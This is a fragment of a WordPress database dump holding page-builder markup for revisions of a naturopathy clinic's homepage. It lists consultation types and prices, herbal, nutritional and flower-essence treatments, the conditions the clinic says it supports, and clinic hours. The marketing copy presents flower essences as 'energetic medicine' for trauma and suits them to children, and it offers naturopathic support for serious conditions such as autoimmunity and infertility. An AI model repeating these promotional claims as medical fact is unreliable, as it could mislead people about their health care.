custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2024-07-02 20:42:24','2024-07-02 12:42:24','',28,'https://verdenaturopathy.com.au/?p=412',0,'revision','',0),(411,1,'2024-07-01 09:08:20','2024-07-01 01:08:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $170\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $60\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" 